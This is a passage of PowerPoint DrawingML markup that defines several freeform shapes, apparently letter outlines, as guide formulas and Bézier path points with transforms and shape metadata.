                <a:gd name="T3" fmla="*/ 30 h 328"/>
                <a:gd name="T4" fmla="*/ 236 w 236"/>
                <a:gd name="T5" fmla="*/ 15 h 328"/>
                <a:gd name="T6" fmla="*/ 216 w 236"/>
                <a:gd name="T7" fmla="*/ 0 h 328"/>
                <a:gd name="T8" fmla="*/ 158 w 236"/>
                <a:gd name="T9" fmla="*/ 0 h 328"/>
                <a:gd name="T10" fmla="*/ 138 w 236"/>
                <a:gd name="T11" fmla="*/ 15 h 328"/>
                <a:gd name="T12" fmla="*/ 158 w 236"/>
                <a:gd name="T13" fmla="*/ 30 h 328"/>
                <a:gd name="T14" fmla="*/ 172 w 236"/>
                <a:gd name="T15" fmla="*/ 30 h 328"/>
                <a:gd name="T16" fmla="*/ 136 w 236"/>
                <a:gd name="T17" fmla="*/ 136 h 328"/>
                <a:gd name="T18" fmla="*/ 123 w 236"/>
                <a:gd name="T19" fmla="*/ 179 h 328"/>
                <a:gd name="T20" fmla="*/ 123 w 236"/>
                <a:gd name="T21" fmla="*/ 179 h 328"/>
                <a:gd name="T22" fmla="*/ 112 w 236"/>
                <a:gd name="T23" fmla="*/ 150 h 328"/>
                <a:gd name="T24" fmla="*/ 66 w 236"/>
                <a:gd name="T25" fmla="*/ 30 h 328"/>
                <a:gd name="T26" fmla="*/ 78 w 236"/>
                <a:gd name="T27" fmla="*/ 30 h 328"/>
                <a:gd name="T28" fmla="*/ 98 w 236"/>
                <a:gd name="T29" fmla="*/ 15 h 328"/>
                <a:gd name="T30" fmla="*/ 78 w 236"/>
                <a:gd name="T31" fmla="*/ 0 h 328"/>
                <a:gd name="T32" fmla="*/ 20 w 236"/>
                <a:gd name="T33" fmla="*/ 0 h 328"/>
                <a:gd name="T34" fmla="*/ 0 w 236"/>
                <a:gd name="T35" fmla="*/ 15 h 328"/>
                <a:gd name="T36" fmla="*/ 20 w 236"/>
                <a:gd name="T37" fmla="*/ 30 h 328"/>
                <a:gd name="T38" fmla="*/ 35 w 236"/>
                <a:gd name="T39" fmla="*/ 30 h 328"/>
                <a:gd name="T40" fmla="*/ 106 w 236"/>
                <a:gd name="T41" fmla="*/ 208 h 328"/>
                <a:gd name="T42" fmla="*/ 108 w 236"/>
                <a:gd name="T43" fmla="*/ 215 h 328"/>
                <a:gd name="T44" fmla="*/ 89 w 236"/>
                <a:gd name="T45" fmla="*/ 269 h 328"/>
                <a:gd name="T46" fmla="*/ 49 w 236"/>
                <a:gd name="T47" fmla="*/ 298 h 328"/>
                <a:gd name="T48" fmla="*/ 52 w 236"/>
                <a:gd name="T49" fmla="*/ 287 h 328"/>
                <a:gd name="T50" fmla="*/ 30 w 236"/>
                <a:gd name="T51" fmla="*/ 266 h 328"/>
                <a:gd name="T52" fmla="*/ 9 w 236"/>
                <a:gd name="T53" fmla="*/ 288 h 328"/>
                <a:gd name="T54" fmla="*/ 50 w 236"/>
                <a:gd name="T55" fmla="*/ 328 h 328"/>
                <a:gd name="T56" fmla="*/ 124 w 236"/>
                <a:gd name="T57" fmla="*/ 257 h 328"/>
                <a:gd name="T58" fmla="*/ 201 w 236"/>
                <a:gd name="T59" fmla="*/ 3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6" h="328">
                  <a:moveTo>
                    <a:pt x="201" y="30"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="216" y="30"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="224" y="30"/>
                    <a:pt x="236" y="30"/>
                    <a:pt x="236" y="15"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="236" y="0"/>
                    <a:pt x="224" y="0"/>
                    <a:pt x="216" y="0"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="158" y="0"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="151" y="0"/>
                    <a:pt x="138" y="0"/>
                    <a:pt x="138" y="15"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="138" y="30"/>
                    <a:pt x="150" y="30"/>
                    <a:pt x="158" y="30"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="172" y="30"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="136" y="136"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="130" y="155"/>
                    <a:pt x="127" y="164"/>
                    <a:pt x="123" y="179"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="123" y="179"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="120" y="170"/>
                    <a:pt x="116" y="159"/>
                    <a:pt x="112" y="150"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="66" y="30"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="78" y="30"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="86" y="30"/>
                    <a:pt x="98" y="30"/>
                    <a:pt x="98" y="15"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="98" y="0"/>
                    <a:pt x="86" y="0"/>
                    <a:pt x="78" y="0"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="20" y="0"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="12" y="0"/>
                    <a:pt x="0" y="0"/>
                    <a:pt x="0" y="15"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="30"/>
                    <a:pt x="13" y="30"/>
                    <a:pt x="20" y="30"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="35" y="30"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="106" y="208"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="108" y="213"/>
                    <a:pt x="108" y="214"/>
                    <a:pt x="108" y="215"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="108" y="216"/>
                    <a:pt x="96" y="257"/>
                    <a:pt x="89" y="269"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="75" y="297"/>
                    <a:pt x="57" y="298"/>
                    <a:pt x="49" y="298"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="49" y="298"/>
                    <a:pt x="52" y="294"/>
                    <a:pt x="52" y="287"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="52" y="275"/>
                    <a:pt x="43" y="266"/>
                    <a:pt x="30" y="266"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="17" y="266"/>
                    <a:pt x="9" y="275"/>
                    <a:pt x="9" y="288"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="9" y="308"/>
                    <a:pt x="25" y="328"/>
                    <a:pt x="50" y="328"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="100" y="328"/>
                    <a:pt x="122" y="263"/>
                    <a:pt x="124" y="257"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="201" y="3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6" name="Freeform 177">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7813E21F-A067-4C37-A7FF-84F0906742DE}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks/>
            </p:cNvSpPr>
            <p:nvPr>
              <p:custDataLst>
                <p:tags r:id="rId73"/>
              </p:custDataLst>
            </p:nvPr>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="2659062" y="1658938"/>
              <a:ext cx="79375" cy="120650"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 119 w 204"/>
                <a:gd name="T1" fmla="*/ 20 h 305"/>
                <a:gd name="T2" fmla="*/ 99 w 204"/>
                <a:gd name="T3" fmla="*/ 0 h 305"/>
                <a:gd name="T4" fmla="*/ 21 w 204"/>
                <a:gd name="T5" fmla="*/ 0 h 305"/>
                <a:gd name="T6" fmla="*/ 0 w 204"/>
                <a:gd name="T7" fmla="*/ 15 h 305"/>
                <a:gd name="T8" fmla="*/ 20 w 204"/>
                <a:gd name="T9" fmla="*/ 30 h 305"/>
                <a:gd name="T10" fmla="*/ 85 w 204"/>
                <a:gd name="T11" fmla="*/ 30 h 305"/>
                <a:gd name="T12" fmla="*/ 85 w 204"/>
                <a:gd name="T13" fmla="*/ 274 h 305"/>
                <a:gd name="T14" fmla="*/ 21 w 204"/>
                <a:gd name="T15" fmla="*/ 274 h 305"/>
                <a:gd name="T16" fmla="*/ 0 w 204"/>
                <a:gd name="T17" fmla="*/ 290 h 305"/>
                <a:gd name="T18" fmla="*/ 20 w 204"/>
                <a:gd name="T19" fmla="*/ 305 h 305"/>
                <a:gd name="T20" fmla="*/ 184 w 204"/>
                <a:gd name="T21" fmla="*/ 305 h 305"/>
                <a:gd name="T22" fmla="*/ 204 w 204"/>
                <a:gd name="T23" fmla="*/ 290 h 305"/>
                <a:gd name="T24" fmla="*/ 184 w 204"/>
                <a:gd name="T25" fmla="*/ 274 h 305"/>
                <a:gd name="T26" fmla="*/ 119 w 204"/>
                <a:gd name="T27" fmla="*/ 274 h 305"/>
                <a:gd name="T28" fmla="*/ 119 w 204"/>
                <a:gd name="T29" fmla="*/ 20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305">
                  <a:moveTo>
                    <a:pt x="119" y="20"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="119" y="5"/>
                    <a:pt x="116" y="0"/>
                    <a:pt x="99" y="0"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="21" y="0"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="13" y="0"/>
                    <a:pt x="0" y="0"/>
                    <a:pt x="0" y="15"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="30"/>
                    <a:pt x="13" y="30"/>
                    <a:pt x="20" y="30"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="85" y="30"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="85" y="274"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="21" y="274"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="13" y="274"/>
                    <a:pt x="0" y="274"/>
                    <a:pt x="0" y="290"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="305"/>
                    <a:pt x="13" y="305"/>
                    <a:pt x="20" y="305"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="184" y="305"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="192" y="305"/>
                    <a:pt x="204" y="305"/>
                    <a:pt x="204" y="290"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="204" y="274"/>
                    <a:pt x="192" y="274"/>
                    <a:pt x="184" y="274"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="119" y="274"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="119" y="2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7" name="Freeform 178">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{971619DB-485D-45C0-8F90-486BCF441045}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noEditPoints="1"/>
            </p:cNvSpPr>
            <p:nvPr>
              <p:custDataLst>
                <p:tags r:id="rId74"/>
              </p:custDataLst>
            </p:nvPr>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="2763837" y="1658938"/>
              <a:ext cx="73025" cy="120650"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 115 w 188"/>
                <a:gd name="T1" fmla="*/ 110 h 305"/>
                <a:gd name="T2" fmla="*/ 95 w 188"/>
                <a:gd name="T3" fmla="*/ 90 h 305"/>
                <a:gd name="T4" fmla="*/ 24 w 188"/>
                <a:gd name="T5" fmla="*/ 90 h 305"/>
                <a:gd name="T6" fmla="*/ 4 w 188"/>
                <a:gd name="T7" fmla="*/ 105 h 305"/>
                <a:gd name="T8" fmla="*/ 24 w 188"/>
                <a:gd name="T9" fmla="*/ 120 h 305"/>
                <a:gd name="T10" fmla="*/ 80 w 188"/>
                <a:gd name="T11" fmla="*/ 120 h 305"/>
                <a:gd name="T12" fmla="*/ 80 w 188"/>
                <a:gd name="T13" fmla="*/ 274 h 305"/>
                <a:gd name="T14" fmla="*/ 20 w 188"/>
                <a:gd name="T15" fmla="*/ 274 h 305"/>
                <a:gd name="T16" fmla="*/ 0 w 188"/>
                <a:gd name="T17" fmla="*/ 290 h 305"/>
                <a:gd name="T18" fmla="*/ 20 w 188"/>
                <a:gd name="T19" fmla="*/ 305 h 305"/>
                <a:gd name="T20" fmla="*/ 167 w 188"/>
                <a:gd name="T21" fmla="*/ 305 h 305"/>
                <a:gd name="T22" fmla="*/ 188 w 188"/>
                <a:gd name="T23" fmla="*/ 290 h 305"/>
                <a:gd name="T24" fmla="*/ 167 w 188"/>
                <a:gd name="T25" fmla="*/ 274 h 305"/>
                <a:gd name="T26" fmla="*/ 115 w 188"/>
                <a:gd name="T27" fmla="*/ 274 h 305"/>
                <a:gd name="T28" fmla="*/ 115 w 188"/>
                <a:gd name="T29" fmla="*/ 110 h 305"/>
                <a:gd name="T30" fmla="*/ 115 w 188"/>
                <a:gd name="T31" fmla="*/ 24 h 305"/>
                <a:gd name="T32" fmla="*/ 90 w 188"/>
                <a:gd name="T33" fmla="*/ 0 h 305"/>
                <a:gd name="T34" fmla="*/ 65 w 188"/>
                <a:gd name="T35" fmla="*/ 24 h 305"/>
                <a:gd name="T36" fmla="*/ 90 w 188"/>
                <a:gd name="T37" fmla="*/ 49 h 305"/>
                <a:gd name="T38" fmla="*/ 115 w 188"/>
                <a:gd name="T39" fmla="*/ 2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5" y="110"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="115" y="95"/>
                    <a:pt x="112" y="90"/>
                    <a:pt x="95" y="90"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="24" y="90"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="17" y="90"/>
                    <a:pt x="4" y="90"/>
                    <a:pt x="4" y="105"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="4" y="120"/>
                    <a:pt x="17" y="120"/>
                    <a:pt x="24" y="120"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="80" y="120"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="80" y="274"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="20" y="274"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="12" y="274"/>
                    <a:pt x="0" y="274"/>
                    <a:pt x="0" y="290"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="305"/>
                    <a:pt x="13" y="305"/>
                    <a:pt x="20" y="305"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="167" y="305"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="175" y="305"/>
                    <a:pt x="188" y="305"/>
                    <a:pt x="188" y="290"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="188" y="274"/>
                    <a:pt x="175" y="274"/>
                    <a:pt x="167" y="274"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="115" y="274"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="115" y="110"/>
                  </a:lnTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="115" y="24"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="115" y="10"/>
                    <a:pt x="104" y="0"/>
                    <a:pt x="90" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="76" y="0"/>
                    <a:pt x="65" y="10"/>
                    <a:pt x="65" y="24"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="65" y="38"/>
                    <a:pt x="76" y="49"/>
                    <a:pt x="90" y="49"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="104" y="49"/>
                    <a:pt x="115" y="38"/>
                    <a:pt x="115" y="2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8" name="Freeform 179">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{659DF595-49B9-4FC7-9620-FE9678C2BF99}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks/>
            </p:cNvSpPr>
            <p:nvPr>
              <p:custDataLst>
                <p:tags r:id="rId75"/>
              </p:custDataLst>
            </p:nvPr>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="2852737" y="1693863"/>
              <a:ext cx="95250" cy="85725"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 77 w 249"/>
                <a:gd name="T1" fmla="*/ 26 h 218"/>
                <a:gd name="T2" fmla="*/ 57 w 249"/>
                <a:gd name="T3" fmla="*/ 3 h 218"/>
                <a:gd name="T4" fmla="*/ 21 w 249"/>
                <a:gd name="T5" fmla="*/ 3 h 218"/>
                <a:gd name="T6" fmla="*/ 0 w 249"/>
                <a:gd name="T7" fmla="*/ 18 h 218"/>
                <a:gd name="T8" fmla="*/ 20 w 249"/>
                <a:gd name="T9" fmla="*/ 33 h 218"/>
                <a:gd name="T10" fmla="*/ 43 w 249"/>
                <a:gd name="T11" fmla="*/ 33 h 218"/>
                <a:gd name="T12" fmla="*/ 43 w 249"/>
                <a:gd name="T13" fmla="*/ 187 h 218"/>
                <a:gd name="T14" fmla="*/ 21 w 249"/>
                <a:gd name="T15" fmla="*/ 187 h 218"/>
                <a:gd name="T16" fmla="*/ 0 w 249"/>
                <a:gd name="T17" fmla="*/ 203 h 218"/>
                <a:gd name="T18" fmla="*/ 20 w 249"/>
                <a:gd name="T19" fmla="*/ 218 h 218"/>
                <a:gd name="T20" fmla="*/ 99 w 249"/>
                <a:gd name="T21" fmla="*/ 218 h 218"/>
                <a:gd name="T22" fmla="*/ 119 w 249"/>
                <a:gd name="T23" fmla="*/ 203 h 218"/>
                <a:gd name="T24" fmla="*/ 99 w 249"/>
                <a:gd name="T25" fmla="*/ 187 h 218"/>
                <a:gd name="T26" fmla="*/ 77 w 249"/>
                <a:gd name="T27" fmla="*/ 187 h 218"/>
                <a:gd name="T28" fmla="*/ 77 w 249"/>
                <a:gd name="T29" fmla="*/ 99 h 218"/>
                <a:gd name="T30" fmla="*/ 139 w 249"/>
                <a:gd name="T31" fmla="*/ 30 h 218"/>
                <a:gd name="T32" fmla="*/ 173 w 249"/>
                <a:gd name="T33" fmla="*/ 74 h 218"/>
                <a:gd name="T34" fmla="*/ 173 w 249"/>
                <a:gd name="T35" fmla="*/ 187 h 218"/>
                <a:gd name="T36" fmla="*/ 153 w 249"/>
                <a:gd name="T37" fmla="*/ 187 h 218"/>
                <a:gd name="T38" fmla="*/ 133 w 249"/>
                <a:gd name="T39" fmla="*/ 203 h 218"/>
                <a:gd name="T40" fmla="*/ 153 w 249"/>
                <a:gd name="T41" fmla="*/ 218 h 218"/>
                <a:gd name="T42" fmla="*/ 230 w 249"/>
                <a:gd name="T43" fmla="*/ 218 h 218"/>
                <a:gd name="T44" fmla="*/ 249 w 249"/>
                <a:gd name="T45" fmla="*/ 203 h 218"/>
                <a:gd name="T46" fmla="*/ 229 w 249"/>
                <a:gd name="T47" fmla="*/ 187 h 218"/>
                <a:gd name="T48" fmla="*/ 207 w 249"/>
                <a:gd name="T49" fmla="*/ 187 h 218"/>
                <a:gd name="T50" fmla="*/ 207 w 249"/>
                <a:gd name="T51" fmla="*/ 72 h 218"/>
                <a:gd name="T52" fmla="*/ 142 w 249"/>
                <a:gd name="T53" fmla="*/ 0 h 218"/>
                <a:gd name="T54" fmla="*/ 77 w 249"/>
                <a:gd name="T55" fmla="*/ 2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9" h="218">
                  <a:moveTo>
                    <a:pt x="77" y="26"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="77" y="10"/>
                    <a:pt x="77" y="3"/>
                    <a:pt x="57" y="3"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="21" y="3"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="13" y="3"/>
                    <a:pt x="0" y="3"/>
                    <a:pt x="0" y="18"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="33"/>
                    <a:pt x="13" y="33"/>
                    <a:pt x="20" y="33"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="43" y="33"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="43" y="187"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="21" y="187"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="13" y="187"/>
                    <a:pt x="0" y="187"/>
                    <a:pt x="0" y="203"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="218"/>
                    <a:pt x="13" y="218"/>
                    <a:pt x="20" y="218"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="99" y="218"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="106" y="218"/>
                    <a:pt x="119" y="218"/>
                    <a:pt x="119" y="203"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="119" y="187"/>
                    <a:pt x="107" y="187"/>
                    <a:pt x="99" y="187"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="77" y="187"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="77" y="99"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="77" y="49"/>
                    <a:pt x="114" y="30"/>
                    <a:pt x="139" y="30"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="166" y="30"/>
                    <a:pt x="173" y="44"/>
                    <a:pt x="173" y="74"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="173" y="187"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="153" y="187"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="145" y="187"/>
                    <a:pt x="133" y="187"/>
                    <a:pt x="133" y="203"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="133" y="218"/>
                    <a:pt x="146" y="218"/>
                    <a:pt x="153" y="218"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="230" y="218"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="237" y="218"/>
                    <a:pt x="249" y="218"/>
                    <a:pt x="249" y="203"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="249" y="187"/>
                    <a:pt x="237" y="187"/>
                    <a:pt x="229" y="187"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="207" y="187"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="207" y="72"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="207" y="21"/>
                    <a:pt x="182" y="0"/>
                    <a:pt x="142" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="109" y="0"/>
                    <a:pt x="86" y="17"/>
                    <a:pt x="77" y="2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89" name="Freeform 180">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1E026A21-8C1F-4437-8275-195C1EA41B42}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noEditPoints="1"/>
            </p:cNvSpPr>
            <p:nvPr>
              <p:custDataLst>
                <p:tags r:id="rId76"/>
              </p:custDataLst>
            </p:nvPr>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="2960687" y="1692275"/>
              <a:ext cx="79375" cy="88900"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 184 w 204"/>
                <a:gd name="T1" fmla="*/ 124 h 223"/>
                <a:gd name="T2" fmla="*/ 204 w 204"/>
                <a:gd name="T3" fmla="*/ 106 h 223"/>
                <a:gd name="T4" fmla="*/ 107 w 204"/>
                <a:gd name="T5" fmla="*/ 0 h 223"/>
                <a:gd name="T6" fmla="*/ 0 w 204"/>
                <a:gd name="T7" fmla="*/ 111 h 223"/>
                <a:gd name="T8" fmla="*/ 115 w 204"/>
                <a:gd name="T9" fmla="*/ 223 h 223"/>
                <a:gd name="T10" fmla="*/ 204 w 204"/>
                <a:gd name="T11" fmla="*/ 165 h 223"/>
                <a:gd name="T12" fmla="*/ 187 w 204"/>
                <a:gd name="T13" fmla="*/ 151 h 223"/>
                <a:gd name="T14" fmla="*/ 170 w 204"/>
                <a:gd name="T15" fmla="*/ 162 h 223"/>
                <a:gd name="T16" fmla="*/ 118 w 204"/>
                <a:gd name="T17" fmla="*/ 192 h 223"/>
                <a:gd name="T18" fmla="*/ 36 w 204"/>
                <a:gd name="T19" fmla="*/ 124 h 223"/>
                <a:gd name="T20" fmla="*/ 184 w 204"/>
                <a:gd name="T21" fmla="*/ 124 h 223"/>
                <a:gd name="T22" fmla="*/ 36 w 204"/>
                <a:gd name="T23" fmla="*/ 95 h 223"/>
                <a:gd name="T24" fmla="*/ 107 w 204"/>
                <a:gd name="T25" fmla="*/ 31 h 223"/>
                <a:gd name="T26" fmla="*/ 169 w 204"/>
                <a:gd name="T27" fmla="*/ 95 h 223"/>
                <a:gd name="T28" fmla="*/ 36 w 204"/>
                <a:gd name="T29" fmla="*/ 9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23">
                  <a:moveTo>
                    <a:pt x="184" y="124"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="195" y="124"/>
                    <a:pt x="204" y="124"/>
                    <a:pt x="204" y="106"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="204" y="49"/>
                    <a:pt x="172" y="0"/>
                    <a:pt x="107" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="48" y="0"/>
                    <a:pt x="0" y="50"/>
                    <a:pt x="0" y="111"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="172"/>
                    <a:pt x="51" y="223"/>
                    <a:pt x="115" y="223"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="181" y="223"/>
                    <a:pt x="204" y="178"/>
                    <a:pt x="204" y="165"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="204" y="151"/>
                    <a:pt x="190" y="151"/>
                    <a:pt x="187" y="151"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="178" y="151"/>
                    <a:pt x="174" y="153"/>
                    <a:pt x="170" y="162"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="159" y="188"/>
                    <a:pt x="132" y="192"/>
                    <a:pt x="118" y="192"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="81" y="192"/>
                    <a:pt x="44" y="167"/>
                    <a:pt x="36" y="124"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="184" y="124"/>
                  </a:lnTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="36" y="95"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="43" y="58"/>
                    <a:pt x="72" y="31"/>
                    <a:pt x="107" y="31"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="133" y="31"/>
                    <a:pt x="164" y="43"/>
                    <a:pt x="169" y="95"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="36" y="9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0" name="Freeform 181">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A2988AEC-E56C-4987-B9D4-09AEFED0E4B6}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks/>
            </p:cNvSpPr>
            <p:nvPr>
              <p:custDataLst>
                <p:tags r:id="rId77"/>
              </p:custDataLst>
            </p:nvPr>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="3065462" y="1692275"/>
              <a:ext cx="74613" cy="88900"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 113 w 193"/>
                <a:gd name="T1" fmla="*/ 93 h 223"/>
                <a:gd name="T2" fmla="*/ 79 w 193"/>
                <a:gd name="T3" fmla="*/ 87 h 223"/>
                <a:gd name="T4" fmla="*/ 31 w 193"/>
                <a:gd name="T5" fmla="*/ 59 h 223"/>
                <a:gd name="T6" fmla="*/ 94 w 193"/>
                <a:gd name="T7" fmla="*/ 31 h 223"/>
                <a:gd name="T8" fmla="*/ 144 w 193"/>
                <a:gd name="T9" fmla="*/ 59 h 223"/>
